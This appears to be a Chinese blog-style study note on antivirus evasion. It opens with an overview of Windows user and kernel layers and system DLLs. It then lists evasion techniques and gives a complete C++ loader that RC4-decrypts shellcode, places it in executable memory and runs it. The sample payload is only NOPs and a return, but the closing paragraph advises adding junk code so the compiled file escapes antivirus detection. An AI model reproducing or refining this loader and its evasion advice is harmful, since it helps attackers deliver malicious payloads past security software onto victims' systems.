免杀学习笔记

Windows架构与免杀技术学习笔记

1. Windows架构概述

Windows操作系统分为 用户层 和 内核层，两者共同构成系统的基础架构，分别负责不同的功能：

用户层

• 用户层是应用程序运行的层面。
• 它包含用户直接接触的应用程序和服务，例如记事本、抖音，虎牙，爱奇艺等。
• 主要负责用户交互和应用程序的逻辑处理。

内核层

• 内核层是驱动程序和系统核心进程运行的层面。
• 它直接与硬件交互，并为用户层提供底层支持。
• 主要负责系统资源管理、安全机制和硬件控制。
• 主要文件：Windows内核的核心部分是 ntoskrnl.exe，它存储在系统硬盘上，并在系统应用程序启动时加载到内存中执行。

---

2. 子系统的作用

子系统是操作系统的重要组件，为不同运行环境提供支持，使操作系统能够兼容多种程序和功能。

主要子系统

• Win32子系统：支持运行基于 Win32 API 的程序。
• POSIX子系统（较旧）：提供对 POSIX 标准程序的支持（如 Unix 程序）。

主要相关的DLL文件

• kernel32.dll：管理内存、线程和I/O操作。
• user32.dll：负责窗口管理和用户界面交互。
• ntdll.dll：提供直接与 Windows 内核交互的底层功能。

DLL 文件的作用

• DLL（动态链接库）文件主要作用是导出函数，供其他程序调用。
• 它可以有效解决程序中重复调用的问题，提高代码复用性，并减少程序体积。
• 如果不小心删除了部分程序会因为无法调用函数而报错，显示缺少某dll文件

---

3. 免杀技术学习

免杀技术的核心是绕过杀毒软件的检测，主要方法包括以下几个方面：

1. 行为隐匿：通过修改程序行为，让其看起来像正常应用程序，避免触发行为检测。
2. 代码混淆：对代码进行加密或混淆，避免静态分析工具识别出恶意特征。
3. 加密与解密：使用动态加密技术隐藏恶意代码，运行时再解密执行。
4. API调用隐藏：通过直接调用底层的 DLL 函数（如 ntdll）绕过常见的 API 检测。
5. RC4加密 ShellCode 绕过防火墙：
   • 使用 RC4 加密技术对 ShellCode 加密，使其在传输和加载时看似无害。
   • 动态解密后执行，绕过防火墙和安全检测。

---

4. RC4 加密 ShellCode 示例代码

以下是 RC4 加密 ShellCode 的示例代码，展示了如何加密和动态解密执行。

#include <iostream>
#include <vector>
#include <windows.h>

using namespace std;

// RC4 加密函数
void rc4(const vector<unsigned char>& key, const vector<unsigned char>& input, vector<unsigned char>& output) {
    vector<unsigned char> S(256);
    for (int i = 0; i < 256; ++i) S[i] = i;

    int j = 0;
    for (int i = 0; i < 256; ++i) {
        j = (j + S[i] + key[i % key.size()]) % 256;
        swap(S[i], S[j]);
    }

    int i = 0, k = 0;
    for (auto c : input) {
        i = (i + 1) % 256;
        k = (k + S[i]) % 256;
        swap(S[i], S[k]);
        output.push_back(c ^ S[(S[i] + S[k]) % 256]);
    }
}

// ShellCode 解密并执行
void executeShellCode(const vector<unsigned char>& encryptedShellCode, const vector<unsigned char>& key) {
    vector<unsigned char> decryptedShellCode;
    rc4(key, encryptedShellCode, decryptedShellCode);

    // 分配内存并复制解密后的 ShellCode
    void* execMem = VirtualAlloc(nullptr, decryptedShellCode.size(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(execMem, decryptedShellCode.data(), decryptedShellCode.size());

    // 执行 ShellCode
    auto func = reinterpret_cast<void(*)()>(execMem);
    func();
}

int main() {
    // 示例 RC4 密钥
    vector<unsigned char> key = {'M', 'Y', '_', 'K', 'E', 'Y'};

    // 示例 ShellCode (NOP sled and return)
    vector<unsigned char> shellCode = {0x90, 0x90, 0x90, 0xC3};

    // 加密 ShellCode
    vector<unsigned char> encryptedShellCode;
    rc4(key, shellCode, encryptedShellCode);

    cout << "Encrypted ShellCode (hex): ";
    for (auto c : encryptedShellCode) printf("%02X ", c);
    cout << endl;

    // 解密并执行
    executeShellCode(encryptedShellCode, key);

    return 0;
}

请各位大佬注意这个代码没有做混淆，生成的exe很容易直接被查杀，一般需要在里面添加很多垃圾代码for循环什么的，去降低代码行为特征这样就能混过去了，至于添加什么全看大佬喜欢。